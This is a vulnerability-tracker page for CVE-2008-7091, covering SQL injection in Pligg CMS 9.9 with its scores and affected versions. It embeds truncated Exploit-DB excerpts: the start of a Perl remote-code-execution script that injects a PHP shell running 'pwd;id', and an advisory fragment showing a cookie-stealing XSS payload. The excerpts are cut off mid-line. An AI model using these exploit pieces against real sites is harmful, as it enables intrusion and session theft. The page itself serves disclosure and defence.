CVE-2008-7091
published 2009-08-26CVE-2008-7091: Multiple SQL injection vulnerabilities in Pligg 9.9 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) id parameter to vote.php…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.10%
79.4th percentile
Multiple SQL injection vulnerabilities in Pligg 9.9 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) id parameter to vote.php, which is not properly handled in libs/link.php; (2) id parameter to trackback.php; (3) an unspecified parameter to submit.php; (4) requestTitle variable in a query to story.php; (5) requestID and (6) requestTitle variables in recommend.php; (7) categoryID parameter to cloud.php; (8) title parameter to out.php; (9) username parameter to login.php; (10) id parameter to cvote.php; and (11) commentid parameter to edit.php.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pligg | pligg_cms | <= 9.9.0 | — |
| pligg | pligg_cms | — | — |
| pligg | pligg_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Pligg CMS 9.9.0 - Remote Code Execution
exploitdb·2008-07-30
CVE-2008-7091 Pligg CMS 9.9.0 - Remote Code Execution
Pligg CMS 9.9.0 - Remote Code Execution
---
#!/usr/bin/perl -w
use LWP::UserAgent;
use MIME::Base64;
use Digest::MD5 qw(md5_hex);
use Getopt::Std; getopts('h:', \%args);
print "#############################################\n";
print "# Pligg new;
$http->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');
#$http->env_proxy(); # cookie_jar({});
my $host = $args{'h'} || usage(); # Host flag. Specify the Pligg root directory
my $user = undef;
my $pass = undef;
my $file = undef;
my $data = undef;
my @auth = undef;
# Details for the php code that is injected in to the template
my $ereg = '(.*?)';
my $cvar = 'cmd';
my $cval = 'pwd;id';
my $code = '';
print "[*] Checking if a shell already exists ...\n";
$data = $http->post(
$host . '/index.p
Exploit-DB
Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection
exploitdb·2008-07-30
CVE-2008-7091 Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection
Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection
---
##########################################################
# GulfTech Security Research July 30, 2008
##########################################################
# Vendor : Pligg LLC
# URL : http://www.pligg.com/
# Version : Pligg alert(document.cookie);
The above example link would display the end users cookie to
them. Of course this can also be used to steal the cookie data
as mentioned earlier in this advisory.
Arbitrary File Access:
A number of file access issues exist in Pligg. They range from
the not so severe (such as arbitrary file enumeration) to the
much more severe (arbitrary file inclusion). In regards to the
arbitrary file enumeration a good example of it can be found in
trackback.php @ line
No writeups or analysis indexed.
http://www.gulftech.org/?node=research&article_id=00120-07312008http://www.osvdb.org/50189http://www.osvdb.org/50190http://www.osvdb.org/50191http://www.osvdb.org/50192http://www.osvdb.org/50193http://www.osvdb.org/50194http://www.osvdb.org/50195http://www.osvdb.org/50196http://www.osvdb.org/50197http://www.osvdb.org/50198http://www.securityfocus.com/archive/1/494987/100/0/threadedhttp://www.securityfocus.com/bid/30458https://exchange.xforce.ibmcloud.com/vulnerabilities/44193https://www.exploit-db.com/exploits/6173http://www.gulftech.org/?node=research&article_id=00120-07312008http://www.osvdb.org/50189http://www.osvdb.org/50190http://www.osvdb.org/50191http://www.osvdb.org/50192http://www.osvdb.org/50193http://www.osvdb.org/50194http://www.osvdb.org/50195http://www.osvdb.org/50196http://www.osvdb.org/50197http://www.osvdb.org/50198http://www.securityfocus.com/archive/1/494987/100/0/threadedhttp://www.securityfocus.com/bid/30458https://exchange.xforce.ibmcloud.com/vulnerabilities/44193https://www.exploit-db.com/exploits/6173
2009-08-26
Published